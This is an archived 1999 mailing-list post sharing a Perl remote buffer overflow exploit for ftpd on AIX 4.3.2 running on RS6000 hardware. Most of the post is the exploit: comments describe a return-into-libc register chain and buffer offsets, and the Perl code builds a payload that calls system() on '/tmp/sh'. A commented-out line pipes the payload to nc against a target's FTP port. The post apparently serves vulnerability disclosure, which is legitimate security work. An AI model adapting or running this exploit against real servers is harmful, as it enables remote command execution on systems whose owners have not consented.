Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on

From: Gerrie (gerrieat_private)
Date: Mon Sep 27 1999 - 20:03:18 PDT

Next message: Szymon Stefanek: "Re: Kvirc bug"

Previous message: Valdis.Kletnieksat_private: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

One of our crewmembers wrote this exploit for the Hack-me project during
HIT2000,
I searched on securityfocus and saw it was still not mailed over here.
IBM has been mailed but due lack of RS6000 knowledge they didn't get it
working.....

#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is an return into libc exploit specificly crafted for
# one box and it is very unlikely to work on another box

# * Author:
#
# dvorak (dvorakat_private)
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek

# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
#      we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffera
#             loads r0 with the next address to jump to (0x1001038c)
#             and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
#             sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is  the plave where TOC is stored but it doesn't seem
#            to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf =  the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
#        0xd00406d4 in our case# 0x00c: thi is the address where r2 is
loaded
#        from just before the call to
#        system(..) we set it to the TOC in our program we don't know if it
#        matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
#     l   r2, 0x14(r1)
#     b   0x10015228
# 0x10015228:
#     l   r12, 0x110(r2)
#     st  r12, 0x14(r1)
#     l   r0, 0x0(r12)
#     l   r2, 0x4(r12)
#     b   r0
# 0x1001038c:
#     l   r3, 0x40(r1)
#     b   0x100136f8
# 0x100136f8:
#     l   r12, 0x3c(r2)
#     st  r12, 0x14(r1)
#     l   r0,  0x0(r12)
#     l   r2,  0x04(r12)

# *** Synnergy Networks

$bufstart = 0x2ff22724;         # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c";     # 0 address of second piece of
                                # 'borrowed' code
$buf .= pack ("N", $bufstart);  # 4
$buf .= "\xd0\x04\x06\xd4";     # 8 system call..
$buf .= "\xf0\x14\x63\x5c";     # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
    $offset += 4;
    $buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";

# offcourse you should change this .
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;

# EOF

gtx,
Gerrie
Mijn antwoorden & uitspraken zijn geheel voor eigen rekening.
tel. 06-24119524
Fun & Secure
http://www.hit2000.org
Join our RC5 Team!

Next message: Szymon Stefanek: "Re: Kvirc bug"
Previous message: Valdis.Kletnieksat_private: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:38 PDT